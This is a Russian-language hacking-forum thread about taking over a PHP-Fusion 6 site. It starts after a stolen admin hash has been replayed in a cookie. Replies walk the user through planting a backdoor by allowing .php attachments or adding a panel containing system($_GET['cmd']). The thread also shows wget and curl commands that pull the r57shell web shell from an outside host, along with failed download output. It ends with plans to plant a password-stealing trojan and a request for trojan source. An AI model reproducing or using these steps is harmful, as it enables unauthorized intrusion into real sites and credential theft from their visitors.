Форум АНТИЧАТ - php-fusion v6.00.306 помогите чайнику

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - php-fusion v6.00.306 помогите чайнику (https://forum.antichat.xyz/showthread.php?t=20098)

php-fusion v6.00.306 помогите чайнику

Сплойтом получил хеш админа, подставил в куки и имею полный доступ в php-fusion.
Подскажите как теперь можно залить скрипт пхп тот же "remview"?

рарзеши в админке приатачивать файлы и добавь расширение .php
потом создавай пост, атач шелл и жми на него =)

пробовал, запрещает запускать скрипты оттуда куда сохраняет атач

Директория, хранящая CGI приложение, доступна на запись другим пользователям. Права на директорию должны быть 0755 или 0711

English description
directory is writable by others: (/home/l/XXXXXXX.hut1.ru/WWW/forum/attachments)

Тогда иди в управление панелями - создать новую, содержание типа

PHP код:


		
			
system($_GET['cmd']);

включи и ок =)

спасибо ща проверю

Использовал: system('wget -o /home/l/xxxxx.hut1.ru/WWW/forum/1.php http://rst.void.ru/download/r57shell.txt');

А что это значит, вместо скрипта (http://xxxxx.hut1.ru/forum/1.php) эта муть получилась:

--18:10:05-- http://rst.void.ru:80/download/r57shell.txt => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 2) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 3) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 4) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 5) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 6) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 7) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 8) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 9) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:10) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:11) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:12) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:13) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:14) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:15) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:16) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:17) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:18) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:19) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:20) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Giving up.

Попробуй другие качалки кроме wget. Например curl.
curl --output /home/l/xxxxx.hut1.ru/WWW/forum/1.php http://rst.void.ru/download/r57shell.txt

А зачем пхп шел закачивать? Нельзя чтоли сразу вписать как

Цитата:

system($_GET['cmd']);

А что дальше?

Цитата:

Сообщение от *Van*

Попробуй другие качалки кроме wget. Например curl.
curl --output /home/l/xxxxx.hut1.ru/WWW/forum/1.php http://rst.void.ru/download/r57shell.txt

Нет там других закачек.

Я просто с аттачмента перенес шелл в нужну с правами папку.

Теперь встал второй вопрос - А ЧТО ДАЛЬШЕ :confused: ?

Всё грохать или дефейсить безпонту.
Что бы Вы посоветовали теперь толкового придумать что бы хоть что-то поиметь с этого?

Я уж и не знаю, может скрипт или какого трояна под видом нужной проги выложить что бы пароли с инета какие есть потырить или ещё чего.
Подло конечно это, но ради учебы и познаний на практике, компьютерный Бог возможно и простит за это:)

Где можно найти исходники желательно на дельфях троянов и прочей гадости?